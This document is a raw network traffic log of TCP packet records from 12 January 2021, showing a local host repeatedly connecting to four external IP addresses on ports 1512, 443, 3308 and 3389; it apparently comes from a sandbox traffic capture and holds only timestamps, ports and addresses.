Jan 12, 2021 07:44:59.588356972 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.641556978 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.641644955 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.642664909 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.695772886 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.702907085 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.702976942 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.703021049 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.703069925 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.713272095 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.767622948 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.767760992 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.778311014 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.778614044 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.831726074 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.831841946 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.869859934 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.884911060 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.884952068 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.989274979 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.989298105 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:59.989433050 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:59.992727041 CET	49327	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:00.045578957 CET	1512	49327	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:00.107670069 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.159869909 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.159974098 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.161372900 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.213496923 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.228245020 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.228326082 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.241008043 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.295670986 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.295862913 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.302130938 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.302352905 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.354581118 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.354645967 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.406815052 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.406975031 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.524867058 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.524904013 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.525051117 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.528028011 CET	49328	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:00.579947948 CET	443	49328	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:00.634205103 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.677607059 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.677706003 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.679202080 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.722289085 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.732850075 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.732867956 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.732944012 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.742949009 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.787779093 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.787921906 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.800649881 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.800973892 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.844017029 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.844214916 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:00.884121895 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.887310982 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.887351036 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.999690056 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.999732018 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:00.999881029 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:01.002939939 CET	49329	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:01.046133995 CET	3308	49329	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:01.121737003 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.175718069 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.175843000 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.177305937 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.231409073 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.246663094 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.246696949 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.246784925 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.262559891 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.324417114 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.324584961 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.334449053 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.334500074 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.388494968 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.388696909 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.427994967 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.443291903 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.443330050 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.532358885 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.532398939 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.532566071 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.538188934 CET	49330	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:01.594042063 CET	3389	49330	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:01.651992083 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.704991102 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.705122948 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.706861019 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.759929895 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.767123938 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.767158985 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.767188072 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.767205000 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.773590088 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.827465057 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.827567101 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.833112001 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.833139896 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.886183023 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.886343956 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:01.926250935 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:01.938991070 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:02.039510965 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:02.039554119 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:02.039709091 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:02.045423031 CET	49331	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:02.098254919 CET	1512	49331	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:02.166965008 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.219310999 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.219423056 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.220803022 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.272778988 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.282641888 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.282737017 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.294995070 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.349664927 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.349841118 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.359961987 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.360337019 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.412436008 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.412695885 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.450792074 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.464667082 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.583689928 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.583740950 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.587181091 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.589530945 CET	49332	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:02.641624928 CET	443	49332	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:02.697407961 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.740828037 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.740950108 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.742559910 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.785614014 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.796350956 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.796385050 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.796453953 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.796494961 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.807404995 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.852253914 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.852372885 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.862782001 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.863089085 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.906440973 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.906851053 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:02.949855089 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.951004028 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:02.951031923 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:03.066591024 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:03.066637039 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:03.066939116 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:03.070837975 CET	49333	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:03.114151001 CET	3308	49333	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:03.187728882 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.241856098 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.241990089 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.243561029 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.297455072 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.323911905 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.323954105 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.324019909 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.324054956 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.337765932 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.407655954 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.407912970 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.418054104 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.418144941 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.472687960 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.473035097 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.512583971 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.527267933 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.527333975 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.619751930 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.619822025 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.620136976 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.627425909 CET	49334	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:03.681632042 CET	3389	49334	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:03.742851019 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.797139883 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.797254086 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.798832893 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.851659060 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.858680964 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.858717918 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.858834028 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.872857094 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.926944971 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.927117109 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.937232971 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.937618017 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:03.990663052 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:03.990966082 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:04.044146061 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:04.145587921 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:04.145627975 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:04.145667076 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:04.145711899 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:04.147943974 CET	49335	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:04.200795889 CET	1512	49335	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:04.258126974 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.310431004 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.310575008 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.312077999 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.364232063 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.378952026 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.379055023 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.395803928 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.450294018 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.450505972 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.460663080 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.461035967 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.513150930 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.513401985 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.565752983 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.565794945 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.737170935 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.737217903 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.737448931 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.743275881 CET	49336	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:04.795403004 CET	443	49336	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:04.865963936 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:04.909255028 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:04.909440041 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:04.911111116 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:04.954385996 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:04.965080023 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:04.965123892 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:04.965183973 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:04.965224981 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:04.980398893 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.025206089 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.025379896 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.035651922 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.035963058 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.079108000 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.079364061 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.118973017 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.122626066 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.122665882 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.234433889 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.234474897 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.234765053 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.240360022 CET	49337	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:05.283535957 CET	3308	49337	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:05.346282005 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.400821924 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.400948048 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.402262926 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.456845045 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.488500118 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.488542080 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.488675117 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.494822979 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.558825016 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.559071064 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.569513083 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.569796085 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.624269009 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.624614954 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.664334059 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.679460049 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.679496050 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.770881891 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.770924091 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.771157980 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.776881933 CET	49338	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:05.832300901 CET	3389	49338	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:05.894510984 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:05.947523117 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:05.947638988 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:05.949246883 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.002130032 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.009013891 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.009052992 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.009130955 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.009175062 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.025955915 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.080156088 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.080383062 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.084287882 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.084462881 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.137259960 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.137511015 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.173705101 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.190437078 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.190479040 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.292517900 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.292561054 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.292831898 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.298506975 CET	49339	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:06.351457119 CET	1512	49339	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:06.405426025 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.458126068 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.458209991 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.458905935 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.511193037 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.525912046 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.526012897 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.541577101 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.596366882 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.596611023 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.602591991 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.602724075 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.655006886 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.655330896 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.694879055 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.707736969 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.826137066 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.826179028 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.826456070 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.832158089 CET	49340	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:06.884356976 CET	443	49340	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:06.956393957 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:06.999712944 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:06.999826908 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.001437902 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.044545889 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.059238911 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.059279919 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.059355974 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.059380054 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.074420929 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.119400978 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.119635105 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.129607916 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.129900932 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.172941923 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.173196077 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.213366032 CET	3308	49341	80.86.91.27	192.168.2.22
